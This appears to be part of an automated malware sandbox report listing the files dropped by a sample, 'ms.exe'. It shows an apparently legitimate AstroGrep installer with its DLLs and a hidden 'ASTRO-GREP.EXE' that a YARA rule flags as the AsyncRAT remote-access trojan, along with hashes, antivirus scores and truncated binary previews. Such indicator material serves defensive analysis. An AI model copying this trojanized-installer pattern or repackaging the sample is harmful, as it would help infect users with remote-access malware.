                                                                                                          SSDEEP:6:TMV0kIffVKNC7VJdfEyFRRAopuAlKNjSt+gP9XWRM5W4QIT:TMG13VOcr6U9wNutJP9UMo4xT
                                                                                                          MD5:502C63E84CACC88FA782EEC1772EFF68
                                                                                                          SHA1:BA6138741633C60D1C92C7C25DDE15D378C0C324
                                                                                                          SHA-256:FE3405C9535DCE3857908E6740099227B7D55CF78A15676D440E781E04EA17BD
                                                                                                          SHA-512:EBA2DD5216BB3293BB3101A5CDADDEF0B4A94577159A8A0654F712F9939F1D03FF670DA6DF0B5F4475D593EDDF330E76E2F6EB19B19E3E51C2EA53A74ACC59B3
                                                                                                          Malicious:false
                                                                                                          Preview: <?xml version="1.0"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/>.. </startup>.... <runtime>.. <gcAllowVeryLargeObjects enabled="true" />.. </runtime>..</configuration>
                                                                                                          C:\Program Files (x86)\AstroGrep\AstroGrep_256x256.png
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6813
                                                                                                          Entropy (8bit):7.898680227457462
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:djkp/iNmEYXGtZEV2QWEgFmPPqlqCSKG1Ief:hmiNmTP733q+XR
                                                                                                          MD5:2143826EABE773D3206333B65C2FC67B
                                                                                                          SHA1:B75806940C971C2BB8584E1028EFA512F8AA5646
                                                                                                          SHA-256:8A50671F22D64A0131C9FFE23B3777862172F6D5C63B48C94DFE0FE8E8D62D06
                                                                                                          SHA-512:3D0611BEE13D6A397D5FB3F2E924829360596891DBCFDE1EC0FCE25F2DDEE62D50A10ABA31827334FE12867C508694BB8FB3F72604FC08A1CD323C2615C2F3FF
                                                                                                          Malicious:false
                                                                                                          Preview: .PNG........IHDR.............\r.f....sRGB.........gAMA......a.....pHYs...3...3.\.......tEXtSoftware.paint.net 4.0.5e.2e....IDATx^.=.]Uv.)......Gr1.........<....K...((((\X.........<.'r...f...I..D@.`.3a&.B.C...``.0~o......y...{...?.K......Z.....u..mS8.~.W..c..i.4x..M\J\....v..S...s.=....1....!U.S.Ri...w...N.3....>......2..,...2.T6...J3.).../.....*......{........xN....`.i.m._.j.E*.fap.'.K`./.Mp...xc...,.z...F...Ri.....<.x.....qOW2..6..L......UWfX...8....t...[..t...*{Y7.....4.E*....9hw...|.t..s.R......=..."`.....T...v.o..W=.y.|......4Y.......H.Y.8&.....|w...~.X...X....-.bH...8...^.]...~.....y....'%-.T.........^.2..k.9.%.&Y....w..D*.4p....>_=.7>l.n2.<..1...4w.3%......G....M...epL....T.I.s4....x.n.i.f=...V.?.6......e.,.$......).n.q..Q..-#.-....W:I8L.W.M.-...+.h..l.8...si.r.S...N..........!.b......hk.N|..P>..RY;h...7.......9wBzH.J.He...../.F'..7]..o.|.V..F........1A..}.....@c.....%^.gf.....~..T.....|1...:f^.W.;O*...,.4.......E...}...k.#.%
                                                                                                          C:\Program Files (x86)\AstroGrep\ICSharpCode.AvalonEdit.dll
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):626688
                                                                                                          Entropy (8bit):6.014937851800105
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:Oo7n6u1n5vp9yRUmqtM0yRrl0pjoeUy8b01vKbZ/gAGl0gUEdYC:OoLDnwmW0yRr88bwKKdf
                                                                                                          MD5:B4D5D46E50006E87B30E7D514E95173C
                                                                                                          SHA1:BD3BA298EB7E4CDBFDF29E3992BE7D32A4E792EB
                                                                                                          SHA-256:058F38F33F3F99F904AB9588447A234346C859718404B4E8A523673ED19CDBE7
                                                                                                          SHA-512:38FF7CADA6CFA56AF812A1D859AAC4FB8B94DF50454A9FECC55E4FDB159339F6BA885D0B57FE8C522227DD9280CDA0CA21C6A073B6552923FA33F6E77D8F3BC5
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: astro-grep-setup.exe.doc, Detection: malicious, Browse
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....f.Y...........!.....`... ......~.... ........@.. ..............................).....@.................................,...O.......8............................}............................................... ............... ..H............text...._... ...`.................. ..`.rsrc...8............p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          C:\Program Files (x86)\AstroGrep\NLog.dll
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):784384
                                                                                                          Entropy (8bit):6.017097344038701
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:/n77J/zrlPjThZdvTU585ZqmjlJzAF7GVj8TcpkMcaQD3SaB5mUsQ:/n77J/zrlPjThZdv55ZbIF7GVje4kRD5
                                                                                                          MD5:063D7646038B3676CA4BBCCF8CD9736C
                                                                                                          SHA1:DE90082E366938A3D1BB16A9B5BBB4D692F620D4
                                                                                                          SHA-256:F809128B8E35F20A0407F9642AEFA1A64D2B5494F024F5EC403B712C67441ECD
                                                                                                          SHA-512:BB50F12A9B5DE65752B7AFDDF82726A82BB06DF8B6B16712385663981DA810189FA9B72FA45122B3C57719D9EB626BB5D1D90B29D833851A4AA08E35B6FDB923
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: astro-grep-setup.exe.doc, Detection: malicious, Browse
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#............." ..0.................. ... ....... .......................`......0.....@.................................3...O.... .......................@......d...T............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................g.......H............L..........4..............................................."..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(X...~....,.~.....oY......+...(......oZ......,..([....*........../7......"..(....*6.(.....(S...*..0..........(.......o\...&.*.(....o]...*2(.....oY...*....0..?.......~..........(X...~....,.~.....oY...+...(.....o^...&...,..([....*.........,4.......0..?.......~..........(X...~....,.~....o_......+...(....o`......,..([..
                                                                                                          C:\Program Files (x86)\AstroGrep\Uninstall.exe
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Category:dropped
                                                                                                          Size (bytes):61854
                                                                                                          Entropy (8bit):6.589895956298641
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:Gw4fpS/nScizHM74N0DIDidcfgdLeAyN9jWtNixGl:Gw4gnScG4DI2dcfceAkWrixq
                                                                                                          MD5:15BDDE25A8A23AAFB0E593D4A1F145B6
                                                                                                          SHA1:250EC8FEA74A2EAC9A1BD3DA1ABF5AC91D1962D7
                                                                                                          SHA-256:4118177FBD02533C449D3D02168300DA1D5B24052B10877A3B4BC03E27C5C375
                                                                                                          SHA-512:3AFB05064722B5616EA74BC8C8E6C50D6EB8F1125AC333339430D05FAE89E445753E45DD5FDCA17E9BE9A94BCA67B3E2B31EEB52DAF2AF3BEC47D0A1EC1ABD03
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Metadefender, Detection: 5%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L....z.W.................`...|.......1.......p....@.......................................@.................................4u..........pP...........................................................................p...............................text...._.......`.................. ..`.rdata..R....p.......d..............@..@.data....T...........x..............@....ndata...................................rsrc...pP.......R...~..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                          C:\Program Files (x86)\AstroGrep\astrogrep.VisualElementsManifest.xml
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):303
                                                                                                          Entropy (8bit):5.268121017723893
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:ejHyWc4subuVFWod/NDhkQwYnF4kQwYWadTZ/FhYWadTZ/FeXXKhdNc0SDSFQ:ebvyWW/meZsR1sR8drDGQ
                                                                                                          MD5:824E6132D30D647AED6E9EE3C2DA12C9
                                                                                                          SHA1:DCBE8CAB6784AA26BC9A4F0DC5B60D9733A49F74
                                                                                                          SHA-256:01BF1A694FAF44953B592D1C237D3F93C1B8B346476C30E638C1FAAD0201386B
                                                                                                          SHA-512:DABC61D48723B53C95EE7BBDDB92261E724054CDCE4F9616B0338CACE8F8A9667CAC087C131D8A83BEE68875436F08F9A313F70EA5B85A46989D2B21C84F0541
                                                                                                          Malicious:false
                                                                                                          Preview: <Application xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>.. <VisualElements.. ShowNameOnSquare150x150Logo='on'.. Square150x150Logo='AstroGrep_256x256.png'.. Square70x70Logo='AstroGrep_256x256.png'.. ForegroundText='light'.. BackgroundColor='#fb7f06'/>..</Application>
                                                                                                          C:\Program Files (x86)\AstroGrep\libAstroGrep.dll
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):237568
                                                                                                          Entropy (8bit):5.286872988422086
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:1QwCS0adLYzS+L5VsbeNcg2IZOz3eJJ9oA3fGu51O+q4gbPaYgVXLRn/qR8H6K69:1QwCAdLy/mucxIUKPOufGu5m4fr
                                                                                                          MD5:6E3AFEF0BD6B7EC03007CCDD76F85447
                                                                                                          SHA1:8B434EAB09D948FAC57E98F312C8B24381873374
                                                                                                          SHA-256:B268CDA0D5F431E0CB86FFF8A39420AC03DFC9C498CAE702F859904B79307EDE
                                                                                                          SHA-512:E10EC66C764584AD80D47C1B0CF64B61EBBE3B4E72D2CA05BCDAB5B62F4E3F6FE17A1C37EED9D87A678B8C3D42E6534DE9EE95BF204CA815426EA28935633894
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.\...........!................n.... ........... ....................................@.....................................S................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H...........X...........................................................^~....-.s.........~....*...}..... .I..}.....(......{....s....}.....s....}....*6.{.....o....*v.{.....o....,..{.....o....*.*r.{.....o....,..{.....o....&*..0...........{.....o....,(.{......o.....{.....o....&.{.....o....&*.{......o.....{....o.....{....1'.{.....{....o....o ...o!...&.{....o"....{.....o....&*..0...........(.....(#...o$...r...p.{....o.....o...+.s&.....o'...o(...-..o'...o).....s*......s+....s,....
                                                                                                          C:\Program Files (x86)\AstroGrep\license.txt
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18330
                                                                                                          Entropy (8bit):4.736471809051081
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:lq2PmwEPb6k1iAVX/dUY2ZrEGMOZt7o0sDTj:lzuVLiY+rTZo0sDTj
                                                                                                          MD5:1324A1677693CF2A399CC9424C756CC3
                                                                                                          SHA1:2F29E68AB545965C401A12CE4783F7314E658AF3
                                                                                                          SHA-256:A4BD518E7F66B63A62035C0C542B5F3287BAF7138E13A0F6A30781D8730D766A
                                                                                                          SHA-512:2FD47275325B3605A9B982704BABFAD72D5AF3048064C66554F00F4D4D264DF252697F1D52733F6C87FBB3927A9FDD48ACF94B2E9475FD52334EFA12EA9F0B5A
                                                                                                          Malicious:false
                                                                                                          Preview: .. GNU GENERAL PUBLIC LICENSE.... Version 2, June 1991.... Copyright (C) 1989, 1991 Free Software Foundation, Inc... 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.. Everyone is permitted to copy and distribute verbatim copies.. of this license document, but changing it is not allowed........ Preamble.... The licenses for most software are designed to take away your..freedom to share and change it. By contrast, the GNU General Public..License is intended to guarantee your freedom to share and change free..software--to make sure the software is free for all its users. This..General Public License applies to most of the Free Software..Foundation's software and to any other program whose authors commit to..using it. (Some other Free Software Foundation software is covered by..the GNU Library General Public License instead.) You can apply it to..your programs, too..... When we speak of free software, we are referring to freedom, not..price. Our General Publi
                                                                                                          C:\Program Files (x86)\AstroGrep\readme.txt
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1834
                                                                                                          Entropy (8bit):4.931632926415765
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:CGEEY1zF17X+B41FcMEEn+0MJ/cIr3EQZ1WrT5M5tmZNijpibbCT32yvosGQC:tYFFN+B41eM2UvQL0T1Fzy/GZ
                                                                                                          MD5:ABE9A78B3FD8ECD7409C2B382820134E
                                                                                                          SHA1:9AEC458EA30060EE633BD25D235C02AAEFF989D1
                                                                                                          SHA-256:B17BBDB71C888116A8661B373CA088C9B174E00551DF81B887EE9BCA28492189
                                                                                                          SHA-512:0F554B3BA4749B22728D303B7AC1BD7596CCAE5A51D0F06560AA829222DD5DFF31F089C2D5894A23D97093836A76595EA5BAA4441EAC4DF44C321F14CD554A3D
                                                                                                          Malicious:false
                                                                                                          Preview: .Changelog for AstroGrep v4.4.7..===================================================================..Bugs..-85: Possible issue with word plugin and leaving winword.exe process open...-98: Error "the string was not recognized as a valid DateTime"..-100: Performance issues..-101: Searching Multiple MS Word Documents..-102: Context Lines Display Discrepancy..-103: Astrogrep 4.4.6 hangs clicking on found file..-104: commandline spath not accepting multiple searchPath..-108: Used ListSeparator on right mouse "Copy all"..-109: Command Line issues - Check logic and docs..-113: Feature 108 is not working (Add additional text editor parameter for search text)....Featured Requests:..-101: Stopped painting status bar as often..-110: Exclude directories that do not match pattern (added not equals option for path based options)..-119: Added line hit count to count column values (format: total / line in current Count column)..-122: Add option to only show x chars before/.after matched text..-12
                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AstroGrep\AstroGrep.lnk
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Apr 4 19:57:44 2019, mtime=Sun Jul 18 04:37:27 2021, atime=Thu Apr 4 19:57:44 2019, length=573440, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1110
                                                                                                          Entropy (8bit):4.634964714009965
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:8mQzdPRmdOEop//OVlOUA7Ly5SdfmvdfvQUUtU7aB6m:8mcPRmdOrN/ClOj7Ly5SdfmvdfvFqxB6
                                                                                                          MD5:4E02F0D58593649DB109E42966511216
                                                                                                          SHA1:1F261578B7374A22C5727AFBA3CEDE9C8827990C
                                                                                                          SHA-256:9969E124D26F04D61C2BC62A9109C720B4826DF21EB92ADD4206FA52BE3B341B
                                                                                                          SHA-512:1CB19D3FF59E0A6773424B7CD5204F75BCCAE1A90D923F5E9A40E7381D12722A5480B68F65D731C6E18E167EC9FC7854F746DADD2ED6A67CAEB380603B5FD7B7
                                                                                                          Malicious:false
                                                                                                          Preview: L..................F.... .......).....i..{......)................................P.O. .:i.....+00.../C:\.....................1.....>Qwx..PROGRA~2.........L..R.,....................V....._...P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....\.1......R.,..ASTROG~1..D.......R.,.R.,.....Y......................E.A.s.t.r.o.G.r.e.p.....h.2......N6. .ASTROG~1.EXE..L......N6..R.,.....Y........................A.s.t.r.o.G.r.e.p...e.x.e.......]...............-.......\...........%?t......C:\Program Files (x86)\AstroGrep\AstroGrep.exe..=.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.s.t.r.o.G.r.e.p.\.A.s.t.r.o.G.r.e.p...e.x.e. .C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.s.t.r.o.G.r.e.p.........*................@Z|...K.J.........`.......X.......114127...........!a..%.H.VZAj...R..-.........-..!a..%.H.VZAj...R..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2
                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AstroGrep\Uninstall AstroGrep.lnk
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sun Jul 18 04:37:27 2021, mtime=Sun Jul 18 04:37:27 2021, atime=Sun Jul 18 04:37:27 2021, length=61854, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1110
                                                                                                          Entropy (8bit):4.665663359768743
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:8m1aRvdOEopF/g+taHfUA7LMdfOhgdfvQUUKj7aB6m:8m1aRvdOrf/g+taHfj7LMdfOhgdfvFND
                                                                                                          MD5:F26EA75861C05D224B5375D6BF24E6FE
                                                                                                          SHA1:F21F56ADF6987A9A8E5A269817A4BC8574C78AF3
                                                                                                          SHA-256:BC15264E99D05B6459DEC01BBF8D55AEAD2E6CDBC166EE0578F217E350E3CA90
                                                                                                          SHA-512:9D5F1CFB1E8EF08D2D8F00D8F9B418C2AB820D09C417A50A1162F6029BA090D0E3A6D05AA1C313E152030D244520697D7BC4F3A5D5C9E73357BBA46A0E126251
                                                                                                          Malicious:false
                                                                                                          Preview: L..................F.... .....|..{...~..{...~..{...............................P.O. .:i.....+00.../C:\.....................1......R.,..PROGRA~2.........L..R.,....................V......E[.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....\.1......R.,..ASTROG~1..D.......R.,.R.,.....Y....................tmC.A.s.t.r.o.G.r.e.p.....h.2......R., .UNINST~1.EXE..L.......R.,.R.,.....Z....................9.A.U.n.i.n.s.t.a.l.l...e.x.e.......]...............-.......\...........%?t......C:\Program Files (x86)\AstroGrep\Uninstall.exe..=.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.s.t.r.o.G.r.e.p.\.U.n.i.n.s.t.a.l.l...e.x.e. .C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.s.t.r.o.G.r.e.p.........*................@Z|...K.J.........`.......X.......114127...........!a..%.H.VZAj...q..-.........-..!a..%.H.VZAj...q..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2
                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ASTRO-GREP.EXE.log
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):614
                                                                                                          Entropy (8bit):5.330897468506462
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhaxzAbDLI4Mq92n4M6:ML9E4Ks2wKDE4KhK3VZ9pKhmsXE4x84j
                                                                                                          MD5:A4395C8F90A59E4CC7F7923D8BDE437C
                                                                                                          SHA1:A8E9EBD5CDF81E720979E795391EF2440CE5DA4A
                                                                                                          SHA-256:F84DFD4D4F8BA0113ED2C0394868B1E4C8F83850DE051FA599621098C190FE6E
                                                                                                          SHA-512:7F1F159667C7F4A9E60E272DF00A2D33A72816F35FEF1DAD37F17B089E506D1CCC0350D569690230F53A44DB49FFDB81BC6E47B7F96BB4469395926F3BC953D3
                                                                                                          Malicious:false
                                                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                          C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE
                                                                                                          Process:C:\Users\user\Desktop\ms.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):48640
                                                                                                          Entropy (8bit):5.561770945961325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:quCFNTAolrhWU5TeLmo2qrJW6K8e2gaM9PIItc5pIX0byDBm1ERjvmFq+YBDZsx:quCFNTA2G2d6K5aM6Itc5pIEbyAqRzyX
                                                                                                          MD5:432F0E0AAB658DE046D8B41D2CEF8253
                                                                                                          SHA1:7BA5B175FFB4BB976C54177F9C40A7339A088654
                                                                                                          SHA-256:17D1C0045155AD9C523C07E0F37AA16CD036915F38B73090D8D8BA930DB149FB
                                                                                                          SHA-512:BAC97805D8FCBA49B7BDE5067911B293622C610A65F2A2FC527A6C890BE8E79C6CA9C9676786B1EAAC19ECBDB16562EFEE2D7C985707FC04E57E4E3033C75B0B
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..^................................. ........@.. ....................... ............@.................................T...W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........Y..Xv.............................................................V..;...$0.xC.=VD..b......9A../.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(>......*2~.....o?...*.s.........*.()...:(...(*...:....(+...:....('...:....((...9.....(v...*V(....s.... ...o....*n~....9....~....o..........*~~....(....9....(0...9....(@...*Vr.%.p~....(o....#...*.s...
                                                                                                          C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          Process:C:\Users\user\Desktop\ms.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Category:dropped
                                                                                                          Size (bytes):950654
                                                                                                          Entropy (8bit):7.974042856320811
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:2MhCG3sDOdqnRrLVvjD9puJ7li2OLUC0Dc/rP0flxwg:AG3sJpRvjhU7I2OLZD/LUr7
                                                                                                          MD5:A708211241313FEAF9621E571631534D
                                                                                                          SHA1:9F398E0CC5B2B5162D5F27A6653709F836D02998
                                                                                                          SHA-256:5C4FAEBE335FEE04B25B10AA2A0E580571388BDE2CC09E133C72D9D01BC09423
                                                                                                          SHA-512:8E2FA5F33E16879D8F5ACB4AB783AA4B4B37266CD1346ABEF5D54F2DFEB2177AF872575780E2E7CD02E462349B1C35642C0F7BA3F860034775A064E9A07B08AF
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Metadefender, Detection: 5%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L....z.W.................`...|.......1.......p....@.......................................@.................................4u..........pP...........................................................................p...............................text...._.......`.................. ..`.rdata..R....p.......d..............@..@.data....T...........x..............@....ndata...................................rsrc...pP.......R...~..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                          C:\Users\user\AppData\Local\Temp\nsq211B.tmp\LangDLL.dll
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5632
                                                                                                          Entropy (8bit):3.936685359308878
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:im1qsjq8W2MPUptuMMFvx/om/ycNSCwVGfOY0vB6/JvR0Jvof5d2D:F1iBl91Z7/ycNSCwV8TLZR0gd2
                                                                                                          MD5:91D5E21907E4BAFF0145339311ABF9D9
                                                                                                          SHA1:F867D8529D4F3704CD4F475B46699B66CB6C2002
                                                                                                          SHA-256:ACDE373CC4916BE5DF3D239AB67F5980C333E979F34965EE733E7C6259586E9B
                                                                                                          SHA-512:339E35B89F2AC7D2FBE9DFD9A55279D20463F7C298332810C0EBAA5DE95E09657F4B2837904AE16A8743C4C7ABF7F3C7581099BC94312C178A21783288790401
                                                                                                          Malicious:false
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9...}.}.}.}.e.....z.)........|....|.Rich}.........PE..L....z.W...........!......................... ...............................`......................................p"..I...` ..P....@..`....................P....................................................... ..`............................text...h........................... ..`.rdata....... ......................@..@.data...l....0......................@....rsrc...`....@......................@..@.reloc..l....P......................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          C:\Users\user\AppData\Local\Temp\nsq211B.tmp\StartMenu.dll
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7680
                                                                                                          Entropy (8bit):4.616039420427882
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:HgiqVPb3X8K8Kdr3gEq6nNdMk6Qiw290+q6LDtJ1tU3hhEl7y:HgiqVPgK8K9eIdE9B/tMhg7
                                                                                                          MD5:9CE20025DEF637F7BE257FA96D25ED05
                                                                                                          SHA1:CFEE47F72804FFACD06C2254A5F8DCF47373F9D4
                                                                                                          SHA-256:4B17C914DC40EBA477B653715F07CE9ED9B2EF4A1264A1DAFD624EB289474243
                                                                                                          SHA-512:AFCE99F1BD803E1B744E33302BA2C85C1122487F2BDF006CA433FE93DB2778A6D68D239D927CE7149443F411A12A4FAC2195D6D01AEC4071C71B8F332C96BDFB
                                                                                                          Malicious:false
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(...(...(..<'...(.......(..8....(.......(..Rich.(..........................PE..L....z.W...........!........."............... ...............................p.......................................$..e.... ..x....P..(....................`..t.................................................... ...............................text............................... ..`.rdata..U.... ......................@..@.data........0......................@....rsrc...(....P......................@..@.reloc..8....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                          C:\Users\user\AppData\Local\Temp\nsq211B.tmp\System.dll
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11264
                                                                                                          Entropy (8bit):5.770824470205811
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:PPtkumJX7zB22kGwfy0mtVgkCPOs81un:E702k5qpds8Qn
                                                                                                          MD5:B8992E497D57001DDF100F9C397FCEF5
                                                                                                          SHA1:E26DDF101A2EC5027975D2909306457C6F61CFBD
                                                                                                          SHA-256:98BCD1DD88642F4DD36A300C76EBB1DDFBBBC5BFC7E3B6D7435DC6D6E030C13B
                                                                                                          SHA-512:8823B1904DCCFAF031068102CB1DEF7958A057F49FF369F0E061F1B4DB2090021AA620BB8442A2A6AC9355BB74EE54371DC2599C20DC723755A46EDE81533A3C
